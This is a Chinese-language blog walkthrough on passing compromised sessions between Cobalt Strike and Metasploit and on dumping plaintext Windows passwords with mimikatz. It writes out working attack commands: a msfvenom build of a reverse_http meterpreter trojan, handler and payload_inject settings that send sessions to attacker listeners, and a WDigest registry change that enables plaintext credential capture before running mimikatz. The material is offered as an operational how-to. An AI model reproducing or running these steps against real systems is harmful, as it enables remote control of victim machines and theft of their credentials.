CS配合MSF互传权限 以及使用mimikatz抓取明文密码

cobalt strike 与 metasploit 互传权限

1.cobalt传递权限给msf

启动server端
./teamserver [监听地址] [密码]
使用客户端连接:
image
生成一个监听器

image
在5555端口 服务端上监听

image
生成后门 可以选择以上几种

image
选择interact 模块进行利用

image
先生成一个外部http监听器
这里填写msf主机所监听的端口和IP

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.80.128
lhost => 192.168.80.128
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
run

使用msf监听对应主机与端口

image
进行权限传递 使用spawn模块
选择
image
成功将权限传递给msf
image
总结一下 cs客户端生成木马 服务器监听对应地址与端口 等待目标主机上线 上线后 在msf主机上监听对应端口与IP 然后cs生成一个外部监听器 将会话派生一个给msf

2.msf传递权限给cobalt

使用msf生成木马:

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.80.128 lport=8888 -f exe >> msf_shell.exe

这是一个反向链接的http木马 通过监听本地 8888端口来反链目标主机 传递数据
然后打开msf控制台监听端口与地址
image
使用windows/local/payloads_inject模块将权限传递给cs

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.80.133
lhost => 192.168.80.1
msf6 exploit(windows/local/payload_inject) > set lport 8855
lport => 8855
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1

用cobalt生成一个监听器 监听服务端 端口和ip与msf一致
image
成功互传权限

mimikatz抓取明文密码

windows 在传递密码时一般使用hash 但在第一次传递密码时 需要一个程序将目标处理变成hash
这时就可以在该进程(lsass)中抓取明文密码
存在前置条件:注册表中UseLogonCredential项必须为1
这个是该项的具体位置HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
可以使用shell对该值进行修改

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

image

并且密码只能在用户登录时才能抓取

mimikatz.exe privilege::debug

抓取明文密码
image
成功

posted @ 2024-05-29 16:31  f0r9  阅读(67)  评论(0编辑  收藏  举报